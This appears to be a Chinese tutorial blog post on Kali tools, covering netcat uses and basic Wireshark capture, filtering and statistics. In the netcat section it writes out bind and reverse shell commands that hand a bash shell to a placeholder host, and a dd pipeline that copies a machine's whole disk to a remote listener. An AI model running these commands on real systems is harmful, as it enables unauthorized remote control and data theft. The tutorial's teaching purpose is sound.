天天看點

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

前言

開始進行kali linux學習(修仙ing)

本文目錄

  • 前言
  • NETCAT——NC
    • NC——TELNET/BANNER
    • NC——傳輸文本資訊
    • NC——傳輸檔案/目錄
      • 傳輸檔案
      • 傳輸目錄
      • 加密傳輸檔案
    • NC——流媒體伺服器
    • NC——端口掃描
    • NC——遠端克隆硬碟
    • NC——遠端控制
    • NC——NCAT
  • Wireshark
    • 基本操作
      • 啟動
      • 抓包/停止抓包
      • 篩選抓取服務
      • 首選項設定
    • Wireshark——篩選器
    • Wireshark——常見協定包
    • Wireshark——資訊統計

本文主要目标是基本工具的了解與使用。

NETCAT——NC

  • 網絡工具中的瑞士軍刀——小身材,大智慧。
  • 偵聽模式/傳輸模式
  • telnet / 擷取banner資訊
  • 傳輸文本資訊
  • 傳輸檔案/目錄
  • 加密傳輸檔案
  • 遠端控制/木馬
  • 加密所有流量
  • 流媒體伺服器
  • 遠端克隆硬碟

NC——TELNET/BANNER

擷取banner資訊

nc -nv 1.1.1.1 110 //pop3服務
nc -nv 1.1.1.1 25  //smtp服務
nc -nv 1.1.1.1 80  //http服務
           

關于擷取banner資訊還有許多其他的工具可以利用,比如nmap還有dmitry都是kali自帶的工具,都可以進行banner資訊的擷取。不一一舉例。

通過

nc -h

檢視功能

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

NC——傳輸文本資訊

這個功能可以用來連接配接兩台主機。進行聊天對話溝通。

A: nc -l -p 4444
B: nc -nv 1.1.1.1 4444
           

第一台主機代表服務端需要先偵聽一個端口,使用第一條指令,

-l

代表listen,也就是聽的意思,

-p

指的是端口,意思就是告訴nc我想要偵聽4444端口。

第二台主機代表用戶端,使用nc連接配接服務端的這個端口,就可以進行聊天。前提條件是,用戶端必須知道服務端開啟的端口和IP位址。

連接配接狀态一方終止兩邊都會終止。

NC——傳輸檔案/目錄

傳輸檔案

A: nc -lp 333 > 1.mp4     #接收端
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1    #發送端
           

接收端表示偵聽一個333端口,并将接受的檔案輸出到1.MP4檔案。

發送端表示nc連接配接輸入檔案進行發送。

-q 1

表示如果傳送結束1秒後自動退出服務。(檔案比較大的話可以使用這個比較友善)

簡單來說就是A開啟服務後,等待着B來給他發送檔案。

或者使用這樣的方式傳輸檔案

A: nc -q 1 -lp 333 < a.mp4
B: nc -nv 1.1.1.1 333 > 2.mp4
           

A作為發送端,先将服務開啟,然後B進行連接配接,一旦連接配接成功,就會進行傳輸,完成後一秒關閉連接配接。

這個是A開啟服務後,準備一個檔案,然後等待B來連接配接它并接收這個檔案。

以上是兩種傳輸方式,可以A傳輸給B也可以B傳輸給A。

傳輸目錄

目錄的傳輸也可以雙向傳輸,與上述檔案傳輸類似。下面隻寫一個方向。

可以使用以下指令

A: tar -cvf -music/ | nc -lp 333 -q 1
B: nc -nv 1.1.1.1 333 | tar -xvf -
           

cvf

是将檔案打包的作用,然後将打包後的檔案灌輸到管道中,使用nc進行傳輸。等待B連接配接。

B連接配接後接收到來自A端的檔案,使用

xvf

解壓tar包。還原成目錄。

加密傳輸檔案

使用指令

A: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
B: nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
           

這個是不用記的,畢竟這麼長。

輸入完整指令後,在A端也就是發送端會提示讓輸入密碼(自己設定),設定密碼後,再次進行輸入(密碼不顯示,直接輸入就行)。

在B端進行連接配接就會提示輸入密碼。這個密碼就是A端設定的密碼。輸入正确就就可以接收。

注:這個加密并不是nc自帶的加密方式。而是利用了另一個程式的功能。這個程式名叫mcrypt,這個kali裡面沒有自帶,需要自行安裝。

安裝方法直接用apt-get包管理器就行。

apt-get install mcrypt -y
           

NC——流媒體伺服器

使用指令

A: cat 1.mp4 | nc -lp 333     # 服務端
B: nc -nv 1.1.1.1 333 | mplayer -vo x11 -cache 3000-      # 用戶端
           

cat是檢視文本資訊的,這裡也可以用來檢視1.MP4的資訊

mplayer是一個媒體播放應用。

cache 3000 表示緩存大小。

NC——端口掃描

端口掃描有好多工具可以使用。比如:nmap、Dmitry、netcat(也就是nc),這些都是kali當中自帶的工具。

這裡主要介紹學習nc

其他的後續可能會寫。

nc -nvz IP位址 端口範圍
如:nc -nvz 192.168.40.138 1-5000
           

NC——遠端克隆硬碟

A: nc -lp 333 | dd of=/dev/sda   #接收方
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1   #這裡B相當于被驗證的電腦
           
  • 遠端電子驗證,可以将目标伺服器硬碟遠端複制或者記憶體。

    if相當于inputfile(輸入)

    of相當于outputfile(輸出)

NC——遠端控制

#正向
A: nc -lp 333 -c bash  #伺服器端
B: nc 1.1.1.1 333      #用戶端
#反向
A: nc -lp 333           #用戶端
B: nc 1.1.1.1 333 -c bash    #伺服器端
           

這裡利用shell使得用nc連接配接的使用者可以進行遠端控制

bash是linux系統自帶的shell。

注:windows使用者把bash改成cmd

NC——NCAT

  • Nc缺乏加密和身份驗證的能力。
  • Ncat包含于nmap工具包中

    使用方法

    依舊是A和B兩台機器實驗

A: ncat -c bash -allow 192.168.20.14 -vnl 333 -ssl
B: ncat -nv 1.1.1.1 333 -ssl
           

參數說明:

A:首先ncat需要給出一個bash(本地shell),然後

-allow

允許,後面加一個IP位址,是伺服器端隻允許指定的IP通路或連接配接。并且偵聽一個端口333

B:直接連接配接就行

連接配接成功後伺服器端會顯示

Ncat:Connection from [ip] [port]

其實過程中兩台主機已經進行了SSL證書驗證和指紋識别。

這個時候使用無論輸入什麼指令或者傳輸什麼資訊,都是經過加密的。這裡兩台主機傳輸資訊的管道就是加密的。

SSL加密有一定的安全性保障,每次使用,它的指紋資訊都是重新生成的。

不同系統/平台的nc參數功能不一定相同。比如Ubuntu的和kali的就不一樣。

Wireshark

這個工具應該都了解,滲透工具排行榜第一。(突然想到了小說)

基本操作

啟動

打開後回看到這樣的(windows系統中)

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

選擇一個進行撲捉流量資料,抓包的時候選擇具體要抓哪個網卡的資料包。

如果這樣還找不到自己想抓的包是哪個的話,就将滑鼠移動到過濾器上,就能看到它的IP。

抓包/停止抓包

kali當中的wireshark

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

emmmm剛打開可能會需要輸入密碼,将kali的使用者密碼輸進去就行了。(我用的是普通使用者登入)可能root使用者不用,看情況自定。

上圖中箭頭指的地方就是以太網。輕按兩下即可進行抓包。

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

點選這裡停止抓包。

下一步,點選這裡會出現可以選擇的隻抓取哪個特定的端口或服務。

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

篩選抓取服務

比如隻抓80端口的資料。

還可以輸入指定IP來抓取資料包。

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

首選項設定

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

不過我不想設定,懶。整那麼多花裡胡哨的做什麼。

Wireshark——篩選器

  • 過濾掉幹擾的資料包
  • 抓包篩選器
  • 顯示篩選器

    篩選IP

    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
    就可以篩選目标IP的資料包。隻看IP為目标IP的資料。

Wireshark——常見協定包

  • 資料包的分層結構
  • Arp
  • lcmp
  • TCP——三次握手
  • UDP
  • DNS
  • http
  • FTP

Wireshark——資訊統計

  • 節點數
  • 協定分布
  • 包大小分布
  • 會話連接配接
  • 解碼方式

這些功能基本都在統計裡面,沒有漢化的版本,名字叫Statistics

kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
  • 捕獲檔案屬性(Summary)
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
    可以看到捕捉的接口,還有一共抓了多少包,包的大小等等一系列資訊。
  • 通過端點(Endpoints)
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

    檢視ipv4,或者TCP和UDP的資訊,可以看出一共是幾個IP位址在通信。

    通過點選Bytes可以按照位元組數進行排序

    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
    查找資訊更加友善。可以檢視哪些IP位址接收或者發送的資料包是最多的,以便了解到目前網絡的資料包的發送與接收的情況。
  • 協定分級
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
    可以看出目前為止我抓的資料包都是什麼協定的,哪些協定占的比例多,一目了然。
  • 分組長度
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

    通過統計包的長度可以看出目前抓取的資料包是打包居多還是小包居多。

    小包較多或者說大量的小包可能會造成網絡的性能不好,還有很多攻擊類型會使用小包來攻擊,很有可能意味着某種攻擊正在發生。

  • 會話
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark
    哪兩個IP在進行對話,在這裡可以看到,并且還有發包和接收包的大小,是A發送給B還是B發送給A都可以清楚的看到。
  • 解碼方式
    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

    在應當進行解碼的位置,右鍵單擊,找到解碼為,然後就可以解碼為其他的協定。

    點選這裡進行選擇更改

    kali神器之實用工具的基本使用(詳細)前言NETCAT——NCWireshark

    wireshark的初步學習到此,以後慢慢實踐。

    文末寄語:

我們知道他們在演戲,他們也知道自己在演戲,他們也知道我們知道他們在演戲,我們也知道他們知道我們知道他們在演戲。——佚名

繼續閱讀